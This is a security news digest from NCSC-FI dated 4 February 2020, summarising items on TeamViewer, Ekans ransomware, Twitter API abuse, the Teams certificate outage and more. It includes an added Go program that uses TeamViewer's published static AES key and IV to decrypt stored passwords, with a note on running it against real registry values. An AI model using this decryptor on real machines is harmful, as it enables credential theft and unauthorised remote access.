Daily NCSC-FI news followup 2020-02-04

TeamViewer

whynotsecurity.com/blog/teamviewer/ TL;DR: TeamViewer stored user passwords in the Windows registry encrypted with AES-128-CBC using the static key 0602000000a400005253413100040000 and IV 0100010067244F436E6762F25EA8D704. If the password is reused anywhere, privilege escalation is possible. If you do not have RDP rights to a machine but TeamViewer is installed, you can use TeamViewer to remote in. TeamViewer also lets you copy data or
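The security-relevant point of the item above is that the key and IV are constants, so "encrypted" here means "readable by anyone who can read the registry value". The following is an added example, not code from the write-up or from TeamViewer: it takes the key and IV quoted above, constructs a sample blob itself (there is no registry access here), and recovers the plaintext from it. The UTF-16LE encoding of the plaintext and the NUL padding are assumptions made for the example, as is the sample password.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Static key and IV quoted in the TeamViewer write-up above. Because both are
// fixed, anyone who can read the stored value can reverse the "encryption".
var (
	tvKey = mustHex("0602000000a400005253413100040000")
	tvIV  = mustHex("0100010067244F436E6762F25EA8D704")
)

func mustHex(s string) []byte {
	b, err := hex.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

// encodeUTF16LE converts a string to little-endian UTF-16 bytes.
// Assumption (not stated on this page): the plaintext is a UTF-16LE string.
func encodeUTF16LE(s string) []byte {
	units := utf16.Encode([]rune(s))
	out := make([]byte, 0, 2*len(units))
	for _, u := range units {
		out = append(out, byte(u), byte(u>>8))
	}
	return out
}

func decodeUTF16LE(b []byte) string {
	units := make([]uint16, 0, len(b)/2)
	for i := 0; i+1 < len(b); i += 2 {
		units = append(units, uint16(b[i])|uint16(b[i+1])<<8)
	}
	return string(utf16.Decode(units))
}

// zeroPad extends b with NUL bytes to a multiple of the AES block size.
// Assumption: NUL padding rather than PKCS#7; the decryptor strips trailing NULs.
func zeroPad(b []byte) []byte {
	if rem := len(b) % aes.BlockSize; rem != 0 {
		b = append(b, make([]byte, aes.BlockSize-rem)...)
	}
	return b
}

// EncryptTeamViewerValue builds a sample blob with the static key/IV. It exists
// only so this example can construct its own input offline.
func EncryptTeamViewerValue(password string) ([]byte, error) {
	block, err := aes.NewCipher(tvKey)
	if err != nil {
		return nil, err
	}
	pt := zeroPad(encodeUTF16LE(password))
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, tvIV).CryptBlocks(ct, pt)
	return ct, nil
}

// DecryptTeamViewerValue is the attacker's side: take the raw stored blob,
// apply AES-128-CBC with the hard-coded key/IV, and return the password.
func DecryptTeamViewerValue(blob []byte) (string, error) {
	if len(blob) == 0 || len(blob)%aes.BlockSize != 0 {
		return "", fmt.Errorf("blob length %d is not a non-zero multiple of %d", len(blob), aes.BlockSize)
	}
	block, err := aes.NewCipher(tvKey)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(blob))
	cipher.NewCBCDecrypter(block, tvIV).CryptBlocks(pt, blob)
	return strings.TrimRight(decodeUTF16LE(pt), "\x00"), nil
}

func main() {
	// Constructed sample: what a stored value would look like for this password.
	blob, err := EncryptTeamViewerValue("Sup3rS3cret!")
	if err != nil {
		panic(err)
	}
	fmt.Printf("stored blob (hex): %s\n", hex.EncodeToString(blob))
	pw, err := DecryptTeamViewerValue(blob)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered password: %q\n", pw)
}
```

To use it against a real value you would replace the constructed blob with the bytes read from the registry; nothing else changes, which is precisely why a hard-coded key offers no protection against a local reader.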

Google launches open-source security key project, OpenSK

nakedsecurity.sophos.com/2020/02/03/google-launches-open-source-security-key-project-opensk/ Interested in using hardware security keys to log into online services more securely? Well, now you can make your own from scratch, thanks to an open-source project that Google announced last week. Read also:

www.theregister.co.uk/2020/02/04/burn_your_own_security_key_google_releases_opensk/

Twitter in the midst of a fascinating snooping scandal: the attacker used Twitter's own API

www.tivi.fi/uutiset/tv/0a8d560d-1578-41c3-9a84-a575bc5db6cd Attackers matched phone numbers to Twitter handles. Read also:

threatpost.com/twitter-api-abused-to-uncover-identities/152521/,

www.zdnet.com/article/twitter-says-an-attacker-used-its-api-to-match-usernames-to-phone-numbers/,

www.theregister.co.uk/2020/02/04/twitter_phone_numbers/ and

www.bleepingcomputer.com/news/security/twitter-fixed-issue-exploited-to-match-phone-numbers-to-accounts/

A frightening finding: ransomware also hits industry

www.is.fi/digitoday/tietoturva/art-2000006395169.html The malware discovered in January cripples industrial software on top of its other mischief. Security researchers have found a new type of ransomware that is not content with the usual hijacking and encryption of files. The program, discovered last month by the security company Dragos and named Ekans, also seeks to damage industrial control systems. Ars Technica also reports on it. Ekans ships with a list of 64 processes belonging to software used in industry, which the malware terminates before it begins its "more conventional" encryption and hijacking of files. The list includes software from Honeywell, General Electric and GE Fanuc, among others. Read also:

www.wired.com/story/ekans-ransomware-industrial-control-systems/,

www.zdnet.com/article/ransomware-attacks-are-now-targeting-industrial-control-systems/ as well as:

www.darkreading.com/attacks-breaches/ekans-ransomware-raises-industrial-control-worries/d/d-id/1336950,

www.tivi.fi/uutiset/tv/99d439eb-2fd3-44e9-919b-75d37a5f5154 and

arstechnica.com/information-technology/2020/02/new-ransomware-intentionally-meddles-with-critical-infrastructure/

More dangerous vulnerabilities in Intel CPUs

www.pandasecurity.com/mediacenter/news/more-dangerous-vulnerabilities-intel-cpus/ Intel has released information about two potentially dangerous flaws in the architecture of its processors. The chip manufacturer had already shipped security updates for similar flaws in May and November 2019. Although the new vulnerabilities appear less critical than the earlier ones, side-channel attacks remain possible.

Traficom puts cybersecurity on the agenda of corporate boards

www.traficom.fi/fi/ajankohtaista/traficom-nostaa-kyberturvallisuuden-yritysten-hallitusten-agendalle A guide aimed at top corporate management, compiled by the National Cyber Security Centre (Kyberturvallisuuskeskus) of the Finnish Transport and Communications Agency (Liikenne- ja viestintävirasto, Traficom), helps secure business in the digital world. The National Cyber Security Centre has published a cybersecurity guide aimed at corporate boards. The guide, "Kyberturvallisuus ja yrityksen hallituksen vastuu" (Cybersecurity and the responsibility of the company board), provides tools and support for improving an organisation's cybersecurity. Read also:

www.kyberturvallisuuskeskus.fi/fi/kyberturvallisuus-ja-yrityksen-hallituksen-vastuu-opas

AZORult Campaign Adopts Novel Triple-Encryption Technique

threatpost.com/azorult-campaign-encryption-technique/152508/ A popular trojan is sneaking its way onto PCs via a malspam campaign that uses three levels of encryption to get past cyber defenses. A recent wave of AZORult-laced spam caught the attention of researchers, who warn that the malicious attachments associated with the campaign use a novel obfuscation technique in an attempt to slip past spam gateways and avoid client-side antivirus detection.

Microsoft Teams goes down after Microsoft forgot to renew a certificate

www.theverge.com/2020/2/3/21120248/microsoft-teams-down-outage-certificate-issue-status Microsoft Teams went down this morning for nearly three hours after Microsoft forgot to renew a critical security certificate. Users of Microsoft's Slack competitor were met with error messages when attempting to sign into the service on Monday morning, with the app reporting that it had failed to establish an HTTPS connection to Microsoft's servers. Read also:

www.tivi.fi/uutiset/tv/4bc9f354-866a-4f48-852b-14b888eae811
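The failure mode in the Teams item above is an expired certificate making every TLS handshake fail at once; the check a practitioner wants is a job that parses each certificate in use and alerts well before NotAfter. The following is an added example and not code from Microsoft or from the article: it computes whole days until expiry for a PEM certificate and classifies the result. The sample certificates are minted inline (self-signed, throwaway) so the example runs offline; the fixed reference date, hostnames and the 14-day warning threshold are assumptions chosen for the example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"fmt"
	"math"
	"math/big"
	"time"
)

// DaysUntilExpiry parses a PEM-encoded certificate and returns the number of
// whole days from now until NotAfter. Negative means the certificate has
// already expired, which is exactly the state that breaks TLS handshakes.
func DaysUntilExpiry(pemData []byte, now time.Time) (int, error) {
	block, _ := pem.Decode(pemData)
	if block == nil || block.Type != "CERTIFICATE" {
		return 0, fmt.Errorf("input does not contain a PEM CERTIFICATE block")
	}
	cert, err := x509.ParseCertificate(block.Bytes)
	if err != nil {
		return 0, fmt.Errorf("parse certificate: %w", err)
	}
	return int(math.Floor(cert.NotAfter.Sub(now).Hours() / 24)), nil
}

// ExpiryStatus turns a day count into an alerting verdict. warnDays is the
// lead time wanted before the deadline (an assumed policy value; pick your own).
func ExpiryStatus(days, warnDays int) string {
	switch {
	case days < 0:
		return "EXPIRED"
	case days <= warnDays:
		return "RENEW SOON"
	default:
		return "OK"
	}
}

// NewSelfSignedPEM mints a throwaway self-signed certificate for the given
// validity window. It exists only to construct sample input for this example.
func NewSelfSignedPEM(cn string, notBefore, notAfter time.Time) ([]byte, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             notBefore,
		NotAfter:              notAfter,
		KeyUsage:              x509.KeyUsageDigitalSignature,
		BasicConstraintsValid: true,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	return pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der}), nil
}

func main() {
	// Fixed reference time so the arithmetic below is reproducible (assumed date).
	now := time.Date(2020, 2, 3, 0, 0, 0, 0, time.UTC)
	// Constructed samples: one certificate that lapsed yesterday, one with a month left.
	lapsed, err := NewSelfSignedPEM("teams.example.test", now.AddDate(-1, 0, 0), now.AddDate(0, 0, -1))
	if err != nil {
		panic(err)
	}
	healthy, err := NewSelfSignedPEM("api.example.test", now.AddDate(-1, 0, 0), now.AddDate(0, 1, 0))
	if err != nil {
		panic(err)
	}
	for name, p := range map[string][]byte{"lapsed": lapsed, "healthy": healthy} {
		days, err := DaysUntilExpiry(p, now)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%-8s %4d days left -> %s\n", name, days, ExpiryStatus(days, 14))
	}
}
```

In production the PEM bytes would come from the served chain (for example the leaf returned by a TLS connection) and `now` from the clock; the check should run on every certificate a service presents, not only the one someone remembered to put in a calendar.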

School’s out as ransomware attack downs IT systems at Scotland’s Dundee and Angus College

www.theregister.co.uk/2020/02/04/dundee_angus_college_ransomware/ A further education college in east Scotland has been struck by what its principal described as a cyber “bomb” in an apparent ransomware attack so bad that students have been told to stay away and reset passwords en masse.

Ashley Madison Breach Extortion Scam Targets Hundreds

threatpost.com/ashley-madison-breach-extortion-scam-targets-hundreds/152481/ Nearly five years after the high-profile Ashley Madison data breach, hundreds of affected users of the website have been targeted by a new extortion attack over the past week. The 2015 breach of the adultery website led to 32 million accounts being publicly dumped online, including victims' names, passwords, phone numbers, credit card information and more. Up to a year after the hack, researchers at Kaspersky said that affected users were still being hit with an array of attacks, from credit card scams to spam emails. Now cybercriminals are exploiting the trove of breached Ashley Madison data again in new, highly personalized and targeted attacks. According to researchers at Vade Secure, extortionists are once again sending emails targeting affected Ashley Madison users.

New EmoCheck Tool Checks if You’re Infected With Emotet

www.bleepingcomputer.com/news/security/new-emocheck-tool-checks-if-youre-infected-with-emotet/ A new utility released by JPCERT/CC (Japan's computer emergency response team) lets Windows users easily check whether they are infected with the Emotet trojan. Emotet is one of the most actively distributed malware families and is spread through phishing emails with malicious Word document attachments. Read also:

github.com/JPCERTCC/EmoCheck

Office 365 to Block Harmful Content Regardless of Custom Configs

www.bleepingcomputer.com/news/security/office-365-to-block-harmful-content-regardless-of-custom-configs/ Microsoft is currently working on new features designed to block malicious content in Office 365 regardless of the custom configurations set up by administrators or users unless manually overridden.

Google Bug Sent Private Google Photos Videos to Other Users

www.bleepingcomputer.com/news/google/google-bug-sent-private-google-photos-videos-to-other-users/ In a serious privacy lapse, Google is notifying users that videos stored in their Google Photos account were mistakenly shared with other unrelated users. Read also:

thehackernews.com/2020/02/google-photos-videos.html

Teen takes down ISP with DDoS attacks to get info on one of its subscribers

www.zdnet.com/article/teen-takes-down-isp-with-ddos-attacks-to-get-info-on-one-of-its-subscribers/ Ukrainian police last month arrested a 16-year-old from the city of Odessa for attempting to extort a local ISP (internet service provider) into sharing data on one of its subscribers. Ukrainian authorities say that when the service provider declined, the teen used distributed denial of service (DDoS) attacks to take down the ISP's network.

These are the top ten software flaws used by crooks: Make sure you’ve applied the patches

www.zdnet.com/article/these-are-the-top-ten-software-flaws-used-by-crooks-make-sure-youve-applied-the-patches/ Hackers are exploiting many of the same security vulnerabilities as last year; most of them affect Microsoft products, but the single most exploited bug of 2019 was in Adobe Flash. Over half of the most common vulnerabilities exploited by criminals to conduct cyber attacks and distribute malware are more than a year old, and some are over five years old, showing how failure to apply security updates leaves organisations open to compromise.

FBI catches hacker that stole Nintendo’s secrets for years

arstechnica.com/gaming/2020/02/fbi-catches-hacker-that-stole-nintendos-secrets-for-years/ A 21-year-old California man has pleaded guilty to hacking Nintendo’s servers multiple times since 2016, using phishing techniques to gain early access to information about the company’s plans. Read also:

www.scmagazine.com/home/security-news/cybercrime/hacker-pleads-guilty-to-stealing-nintendo-secrets/ and

www.bleepingcomputer.com/news/security/nintendo-hacker-pleads-guilty-to-child-porn-charges-faces-25-years/

Electric scooters vulnerable to remote hacks

www.welivesecurity.com/2020/02/04/electric-scooters-vulnerable-remote-hacks/ Electric scooters are steadily becoming a popular alternative for short commutes. Besides convenience, however, they also introduce a range of cybersecurity and privacy risks, according to a study by the University of Texas at San Antonio (UTSA). The review, which UTSA calls "the first review of the security and privacy risks posed by e-scooters and their related software services and applications", outlines various attack scenarios that riders might face, as well as how to tackle the risks. Many e-scooters rely on a combination of Bluetooth Low Energy (BLE) and the rider's smartphone internet connection to operate and to send data to the service provider. This opens up a number of avenues for potential attacks. For example, bad actors could eavesdrop on the data being broadcast, which could in turn lead to Man-in-the-Middle (MitM) and replay attacks. Those could allow hackers to

WhatsApp Bug Allowed Attackers to Access the Local File System

www.bleepingcomputer.com/news/security/whatsapp-bug-allowed-attackers-to-access-the-local-file-system/ Facebook patched a critical WhatsApp vulnerability that would have allowed potential attackers to read files from a user’s local file system, on both macOS and Windows platforms. Read also:

www.facebook.com/security/advisories/cve-2019-18426

Medtronic Patches Implanted Device, CareLink Programmer Bugs

threatpost.com/medtronic-patches-implanted-device-carelink/152533/ Medtronic has released updates to address known vulnerabilities in its line of connected medical devices that were initially disclosed last year and in 2018. The vendor has addressed two sets of bugs. The first group, disclosed in March of last year, is found in a range of Medtronic implanted cardiac resynchronization therapy with defibrillation (CRT-D) devices; and in multiple implantable cardioverter defibrillators (ICDs). An ICS-CERT advisory last week gives the most severe of the flaws a CVSS “critical” severity rating of 9.3.